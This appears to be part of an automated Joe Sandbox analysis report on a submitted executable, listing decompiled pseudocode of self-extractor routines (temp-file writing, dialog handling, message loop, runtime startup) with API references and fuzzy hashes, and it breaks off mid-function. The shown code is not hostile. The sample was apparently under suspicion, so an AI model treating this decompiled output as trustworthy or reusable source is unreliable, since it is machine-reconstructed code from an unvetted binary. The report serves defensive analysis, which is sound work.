                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: a705c535846d0a3d95b2d30c8f1bfd461f2464f76476371322fcc5f7066c529b
                                                                                                                                                                                                                                            • Instruction ID: c9f7307b7114845430b630e09c46d3829508237e581851f8850018f1da209558
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a705c535846d0a3d95b2d30c8f1bfd461f2464f76476371322fcc5f7066c529b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501F4B57006347FF32726667C86F7B218EDBD4795F014039B706E5180DA68EC1141B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00327155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x328004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x328004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x328008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00327182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00327191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0032719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 003271A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 003271B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 424e94de489e1e75c748a0c59e235dcd3f62552aaa58229110f055aebbeb9bd8
                                                                                                                                                                                                                                            • Instruction ID: 8cdb5960195fcce4ef18d48a3eb8b42db40bf583138551cd2c4c4ba9cab03c53
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424e94de489e1e75c748a0c59e235dcd3f62552aaa58229110f055aebbeb9bd8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A112171D05618EFCB21DFB8EA4869EB7F8FF48315F518459D405D7210DB30AA158B41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E003219E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E003243D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x329a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00321A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00321A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00321A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00321A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00321A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 51a069816852b29fcd52c5e872cfbf52d9f87d078958e54b1f377d885221b0da
                                                                                                                                                                                                                                            • Instruction ID: 8a643f3f42c82484ef2169c328ee180ee7d60e82c737fed2eae9598b1de8407e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a069816852b29fcd52c5e872cfbf52d9f87d078958e54b1f377d885221b0da
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB11C431501529AFDB22EF64EE09AAE77BCEF59310F108159F912D7190DA30AE22CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E003263C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00321781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				E0032658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003263EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-1116576409
                                                                                                                                                                                                                                            • Opcode ID: dcdff1b5eb49886ac012f6bf6796210255fa60175bd7c4b76076011b8df58efd
                                                                                                                                                                                                                                            • Instruction ID: 2417bd59cb28fe144ad490fba49d2925f88e684b368c3e69e30b10b42086559c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcdff1b5eb49886ac012f6bf6796210255fa60175bd7c4b76076011b8df58efd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921A571A0022CAFD722DF26EC86FEB776CEF49314F104169F585A7180DAB06D958FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003247E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00321680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0x3291e0; // 0x2b58e90
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0x3291e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					E003244B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            				E003244B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00324E6F), ref: 003247EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00324823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00324847
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00324851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-1116576409
                                                                                                                                                                                                                                            • Opcode ID: 8331427196459cc6c4518c555f3e04f5829b096d59405ad0710bb0220d4ea0f9
                                                                                                                                                                                                                                            • Instruction ID: 567e0602b42eb5b2bbf7439deff5cea45c9b79e22dcf5774fb2c9d83b6f41223
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8331427196459cc6c4518c555f3e04f5829b096d59405ad0710bb0220d4ea0f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D112579604A516FD7279F24BC18F763B5EEB85310F15851DFE828B341DA369C078660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0032369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 003236CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003236DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 2d20f55a2f72683e41e9e6269f38360a45e9bc1d1c6ecf37556ba8f4ea3b423f
                                                                                                                                                                                                                                            • Instruction ID: 915400ac996e6e766e9e836192ab2cb3a4a20bc46a8a08d5f131d9d5336ea47b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d20f55a2f72683e41e9e6269f38360a45e9bc1d1c6ecf37556ba8f4ea3b423f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B01A77290022477DB314BA66C8CEEB767CEBC5B20F01011DF905E2180D564D651C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E003265E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00322B33), ref: 00326602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00326612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00326629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00326635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: f7eda84e238859c762e2f2be884f95192077d8f07fdbeca6fc557ee52fe4e5c2
                                                                                                                                                                                                                                            • Instruction ID: f2661c044bed96abb5a48d6b938d08b1aa975016ea5d96d894f6b9b482f69859
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7eda84e238859c762e2f2be884f95192077d8f07fdbeca6fc557ee52fe4e5c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1F028320049606FE7331B28AC898BBBF9CDF8B364F2A01AFE4D282001D6150D0786A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003269B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0x3281f8 = E00326C70();
                                                                                                                                                                                                                                            				__set_app_type(E00326FBE(2));
                                                                                                                                                                                                                                            				 *0x3288a4 =  *0x3288a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0x3288a8 =  *0x3288a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0x328528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0x32851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00327000();
